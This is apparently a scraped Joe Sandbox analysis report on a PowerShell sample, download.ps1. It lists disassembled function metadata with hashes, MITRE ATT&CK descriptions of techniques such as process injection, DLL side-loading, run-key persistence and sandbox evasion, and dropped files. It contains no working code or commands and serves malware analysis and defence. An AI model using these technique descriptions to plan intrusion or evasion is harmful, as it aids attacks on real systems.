Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Deallocmalloc
String ID: EJ1
API String ID: 2267669106-3528995212
Opcode ID: 3acc29d0f17750077e007f4220ab7307b59cae0517203330514029e261d20a9f
Instruction ID: cbbccc7c027c557dcacd8ad3d6db785c651a20822c9be40f273d59627e63e5f5
Opcode Fuzzy Hash: 3acc29d0f17750077e007f4220ab7307b59cae0517203330514029e261d20a9f
Instruction Fuzzy Hash: 80311836B09B4585EB50DF56E8992AD73A4FB88BA0F944136CA4D43721EF3DE855CB00

Function 00007FFD86238D20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON3 ref: 00007FFD86238E01

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

EJ1, xrefs: 00007FFD86238D29

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Deallocmalloc
String ID: EJ1
API String ID: 2267669106-3528995212
Opcode ID: 4b28ad157528be4b48253585316b0ec38bb63e7fe634122cb8f2f9e2019a2431
Instruction ID: afaded9029a0ab3bc34a15e1eea922290b34cfecd9b81aa2887d909ede5ac23b
Opcode Fuzzy Hash: 4b28ad157528be4b48253585316b0ec38bb63e7fe634122cb8f2f9e2019a2431
Instruction Fuzzy Hash: EE313876B08B4585EB50DF16E8992AE73A4FB88BA0F944032CA4D47720EF3DE845C700

Function 00007FFD86291020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

PyFloat_FromDouble.PYTHON3 ref: 00007FFD86291084

Strings

__getitem__, xrefs: 00007FFD8629109C
QVector2D, xrefs: 00007FFD862910A8

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: DoubleFloat_From
String ID: QVector2D$__getitem__
API String ID: 329246742-4163204681
Opcode ID: f00f5adf0af195b09657581a2c2691f5d307df3a71c15228fce128852d685f1c
Instruction ID: 8323cfebd0720f070132a155c9e4deb9bfc45f3aabdfaf7cb365d48f3e5cdbfa
Opcode Fuzzy Hash: f00f5adf0af195b09657581a2c2691f5d307df3a71c15228fce128852d685f1c
Instruction Fuzzy Hash: C4115231B0CA4681EB008B2AF4A96AD6760FF89BA4F584032DA4D07764EF3DD884C700

Function 00007FFD875927C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_PyObject_GC_New.PYTHON313(?,?,00000000,00007FFD8759274F), ref: 00007FFD875927C6
PyObject_GC_Track.PYTHON313(?,?,00000000,00007FFD8759274F), ref: 00007FFD875927F8

Strings

3.2.0, xrefs: 00007FFD875927D4

Memory Dump Source

Source File: 0000000F.00000002.2691104187.00007FFD87591000.00000020.00000001.01000000.00000040.sdmp, Offset: 00007FFD87590000, based on PE: true

Associated: 0000000F.00000002.2691050427.00007FFD87590000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD87596000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD875DA000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD875E8000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD87637000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691515219.00007FFD8763A000.00000004.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691572339.00007FFD8763C000.00000002.00000001.01000000.00000040.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd87590000_check.jbxd

Similarity

API ID: Object_$Track
String ID: 3.2.0
API String ID: 16854473-1786766648
Opcode ID: 76703d1612d6e4714df42c5d19f915ca772ef609570fabb6ef902927984103e5
Instruction ID: 065399e7cdce005d2b6a4069559843995380983c77bd834e131d98fb3a5c2ac5
Opcode Fuzzy Hash: 76703d1612d6e4714df42c5d19f915ca772ef609570fabb6ef902927984103e5
Instruction Fuzzy Hash: 36E0E524B8AB02C2EB168F21F4602B462B4FF0DB54B5401B9CD4C02320EF3CE1A8C280

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report download.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_b144984def4d33843c3348cb5ac9d7933b983_17fc3fad_5ca130b0-7a2e-4261-afa6-0e80c9f448ba\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_b144984def4d33843c3348cb5ac9d7933b983_17fc3fad_cd14b44a-584f-4fc5-a949-dd7151309e0b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_b144984def4d33843c3348cb5ac9d7933b983_17fc3fad_ec1ec674-1875-4f20-ac76-9f80f62308eb\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5570.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER58AD.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER58FC.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8385.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER858A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER85F8.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA313.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA3DF.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA43E.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\MSVCP140.dll

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\MSVCP140_1.dll

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Core.dll

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5DBus.dll

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Gui.dll

Windows Analysis Report
download.ps1

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre